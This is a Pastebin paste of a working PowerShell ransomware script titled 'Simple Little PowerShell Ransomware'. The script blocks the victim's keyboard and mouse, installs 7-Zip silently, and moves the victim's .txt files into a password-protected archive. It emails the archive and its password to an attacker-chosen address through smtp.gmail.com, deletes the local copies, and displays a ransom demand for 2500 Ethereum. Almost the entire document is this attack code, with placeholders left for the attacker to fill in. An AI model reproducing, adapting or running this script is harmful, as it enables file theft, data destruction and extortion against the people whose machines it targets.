Advertisement
FlyFar

Simple Little PowerShell "Ransomware"

Oct 24th, 2021
251
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #Temporarily disable user mouse and keyboard input
  2. $code = @"
  3.    [DllImport("user32.dll")]
  4.    public static extern bool BlockInput(bool fBlockIt);
  5. "@
  6.  
  7. $userInput = Add-Type -MemberDefinition $code -Name UserInput -Namespace UserInput -PassThru
  8. $userInput::BlockInput($true)
  9.  
  10. #Install 7zip to zip files
  11. $workdir = "c:\installer\"
  12.  
  13. If (Test-Path -Path $workdir -PathType Container)
  14. { Write-Host "$workdir already exists" -ForegroundColor Red}
  15. ELSE
  16. { New-Item -Path $workdir  -ItemType directory }
  17.  
  18. #Download the installer
  19. $source = "http://www.7-zip.org/a/7z1604-x64.msi"
  20. $destination = "$workdir\7-Zip.msi"
  21.  
  22.  
  23. if (Get-Command 'Invoke-Webrequest')
  24. {
  25.      Invoke-WebRequest $source -OutFile $destination
  26. }
  27. else
  28. {
  29.     $WebClient = New-Object System.Net.WebClient
  30.     $webclient.DownloadFile($source, $destination)
  31. }
  32.  
  33. Invoke-WebRequest $source -OutFile $destination
  34.  
  35. #Start the installation
  36. msiexec.exe /i "$workdir\7-Zip.msi" /qb
  37.  
  38. #Wait a few Seconds for the installation to finish
  39. Start-Sleep -s 10
  40.  
  41. #Remove the installer
  42. rm -Force $workdir\7*
  43.  
  44. #Set source and destination of files to copy and store (ideally you would use something other than desktop)
  45. $Source = "C:\Users\(username)\Desktop\StealableFiles"
  46. $Destination = "C:\Users\(username)\Desktop\StolenFiles"
  47.  
  48. #Copy all files with certain extension and delete them in the source location
  49. $cp = robocopy /mov $Source $Destination *.txt /s
  50.  
  51. #Generate a random 8 character password
  52. [Reflection.Assembly]::LoadWithPartialName("System.Web")
  53. $randomPassword = [System.Web.Security.Membership]::GeneratePassword(8,2)
  54.  
  55. #Set source for 7zip exe (usually the same path in most basic computers)
  56. $pathTo64Bit7Zip = "C:\Program Files\7-Zip\7z.exe"
  57.  
  58. #Zip destination folder with the random password previously generated
  59. $arguments = "a -tzip ""$Destination"" ""$Destination"" -mx9 -p$randomPassword"
  60. $windowStyle = "Normal"
  61. $p = Start-Process $pathTo64Bit7Zip -ArgumentList $arguments -Wait -PassThru -WindowStyle $windowStyle
  62.  
  63. #Delete the destination folder
  64. $del = Remove-Item $Destination -Force -Recurse
  65.  
  66. $email = "(enter email address you want files sent to)"
  67.  
  68. #Send password for files to your e-mail
  69. $SMTPServer = "smtp.gmail.com"
  70. $Mailer = new-object Net.Mail.SMTPclient($SMTPServer)
  71. $From = $email
  72. $To = $email
  73. $Subject = "$Destination Password $(get-date -f yyyy-MM-dd)"
  74. $Body =  $randomPassword
  75. $Msg = new-object Net.Mail.MailMessage($From,$To,$Subject,$Body)
  76. $Msg.IsBodyHTML = $False
  77. $Mailer.send($Msg)
  78. $Msg.Dispose()
  79. $Mailer.Dispose()
  80.  
  81. #Send zip folder to your e-mail
  82. $ZipFolder = "C:\Users\(username)\Desktop\StolenFiles.zip"
  83. $SMTPServer = "smtp.gmail.com"
  84. $Mailer = new-object Net.Mail.SMTPclient($SMTPServer)
  85. $From = $email
  86. $To = $email
  87. $Subject = "$Destination Content $(get-date -f yyyy-MM-dd)"
  88. $Body = "Zip Attached"
  89. $Msg = new-object Net.Mail.MailMessage($From,$To,$Subject,$Body)
  90. $Msg.IsBodyHTML = $False
  91. $Attachment = new-object Net.Mail.Attachment($ZipFolder)
  92. $Msg.attachments.add($Attachment)
  93. $Mailer.send($Msg)
  94. $Attachment.Dispose()
  95. $Msg.Dispose()
  96. $Mailer.Dispose()
  97.  
  98. #Delete the zip file created
  99. $del = Remove-Item $ZipFolder -Force -Recurse
  100.  
  101. #Disable temporary user keyboard and mouse input block
  102. $userInput::BlockInput($false)
  103.  
  104. #Display a message demanding money
  105. #Add the required .NET assembly for message display
  106. Add-Type -AssemblyName System.Windows.Forms
  107.  
  108. #Show the message
  109. $result = [System.Windows.Forms.MessageBox]::Show('We have some of your important files!!! We demand 2500 Etherum for their return! be careful next time when surfing Internet!', '!-Notice-!', 'Ok', 'Warning')
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement